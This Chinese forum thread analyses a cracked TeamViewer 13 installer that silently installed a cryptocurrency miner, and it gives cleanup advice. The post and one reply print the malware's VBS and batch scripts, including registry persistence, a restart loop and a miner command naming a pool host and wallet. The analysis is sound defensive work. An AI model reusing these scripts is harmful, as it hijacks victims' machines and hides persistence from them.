网站 › 『病毒分析区』 › 你下载的TeamViewer13破解版可能有毒

丶小蓝丶 发表于 2018-8-13 16:05

你下载的TeamViewer13破解版可能有毒

本帖最后由 丶小蓝丶 于 2018-8-13 16:10 编辑

0×0 故事背景最近有个远程管理一下某内网服（tiao）务（ban）器（ji）的需求，映射到公网又不安全毕竟黑帽子这么多，思来想去之后还是觉得老老实实装个Teamviewer最靠谱，度娘一下发现还真的不少破解版资源可以下载，于是随意下载一个破解版准备开始操作。
0×1 安装过程 先看一下文件描述信息也没有发现什么问题，就开始下一步安装了。

安装完成了功能正常，一切OK，渐渐的电脑开始卡到爆，敏感的有一种不好的预感。

0×2 问题排查开始仔细的检查一下进程列表在最后发现了一个奇怪的进程，居然被植入了挖矿病毒这个也太明显了吧，也不搞点进程注入无文件攻击之类的高端技术，系统盘下面也多了不少.bat与.vbs文件
。
直接结束了挖矿的进程之后又自动起来了，还是看看这些同伴里面到底写了什么玩意。

0.Servicecrsssr.vbs： im WShellSet WShell = CreateObject("WScript.Shell")WShell.Run "%windir%\winvprse.bat", 0Set WShell = Nothing
1.Winprs.bat：
@Echo OffREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run /v "Chrome" /f /t REG_SZ /d "%windir%\servicecrsssr.vbs"Exit
2.Winvpr.vbs：
im WShellSet WShell = CreateObject("WScript.Shell")WShell.Run "winprs.bat", 0Set WShell = Nothing
3.Winvprse.bat：
@echo offSETLOCAL EnableExtensions:starttimeout /t 160 /nobreak > NULecho offtasklist /FI "IMAGENAME eq wmipvrse.exe" 2>NUL | find /I /N "wmipvrse.exe" >NULif "%ERRORLEVEL%"=="0" goto starttasklist /FI "IMAGENAME eq wmipvrse.exe" 2>NUL | find /I /N "wmipvrse.exe" >NULif "%ERRORLEVEL%"=="1" goto processnotrunning:processnotrunningstart "" "%windir%\xdgaudio.vbs"goto startexit
4.xdgaudio.vbs
Dim WShellSet WShell = CreateObject("WScript.Shell")WShell.Run "wmipvrse.exe --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o stratum+tcp://krb.crypto-coins.club:5555 -u KjCJtxsXLAd4hUBXAUKxPSPn3L2YaAgihUUc8SQAaCfeG1QpN3kNyLyBRjRUdzmaAdYhMyoZJvUMceBuWcR3a9rnA3U4EBJ -p x", 0Set WShell = Nothing


5.Wmipvrse.exe 矿池与钱包都这么出来了，看看到底挖了多少钱。


0×3 逆向分析对Wmipvrse.exe这个进程里面的东西还是感到好奇，决定还是看一看，已经加壳了不过还好是UPX的标准壳可直接脱。
CPU-miner github上面的开源代码



0×4 病毒清理 事到如此根据几个vbs与bat文件的内容，运行原理还是比较清楚了，就动手清理了。
Step1：使用PCHunter删除6个病毒母体
servicecrsssr.vbs
Winprs.bat
Winvpr.vbs
Winvprse.bat
Wmipvrse.exe
xdgaudio.vbsStep
2：清除注册表

0×5 总结 1.下载软件尽量选择官方平台或者可信的第三方软件平台。2.天下没有白吃的午餐，破解版软件里面可能含有一些让你惊喜的病毒木马后门，也许是一个大礼包呢。3.安全无小事，日常需注意。
本文作者：si1ence，转载自FreeBuf.COM

丶小蓝丶 发表于 2018-8-13 17:31

大家也可以看看这个帖子大牛写的很详细了：一个挖矿病毒浅析
https://www.52pojie.cn/thread-753785-1-1.html
(出处: 吾爱破解论坛)

scott42 发表于 2018-8-26 21:57

xprambler 发表于 2018-8-24 15:28
TeamViewer可以直接下载官方版本啊，完全可以满足个人的需求，远程什么的完全免费。      抛开病毒不讨论 ...

用破解版的应该大多是规模不大的公司（可能大公司也有用，应该还是看IT运维重要程度），不想花钱买正版，，，底下员工就上网下破解版

返人类 发表于 2018-8-13 17:20

valueble123 发表于 2018-8-13 16:54
感觉很厉害但是看不明白，不知道楼主是怎么看出的挖矿的病毒的呢，有什么特征或者说进程名字特征呢，小白一 ...

CreateObject("WScript.Shell")WShell.Run "wmipvrse.exe --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o stratum+tcp://krb.crypto-coins.club:5555 -u KjCJtxsXLAd4hUBXAUKxPSPn3L2YaAgihUUc8SQAaCfeG1QpN3kNyLyBRjRUdzmaAdYhMyoZJvUMceBuWcR3a9rnA3U4EBJ -p x"

看不出么……多么明显了……认真看啊

aspicownre 发表于 2018-8-13 16:11

顶顶顶，坏人还是很多的，注意注意

keysersoze88 发表于 2018-8-13 16:14

我是论坛里下的,应该没问题吧

lijin320925 发表于 2018-8-13 16:15

论坛里的有毒吗？

hnldzhy 发表于 2018-8-13 16:16

吓死人了，顶一个

akinet 发表于 2018-8-13 16:18

毒啊，无毒不欢啊

zhaoyafei19 发表于 2018-8-13 16:20

老大NB
分析的清清楚楚

梦入神机 发表于 2018-8-13 16:22

刚看过这篇文章，又见到了{:1_908:}

feiyunnh 发表于 2018-8-13 16:25

自已用的，用官方个人版都没所谓啦。

m0216 发表于 2018-8-13 16:27

感谢分享!~

查看完整版本: 你下载的TeamViewer13破解版可能有毒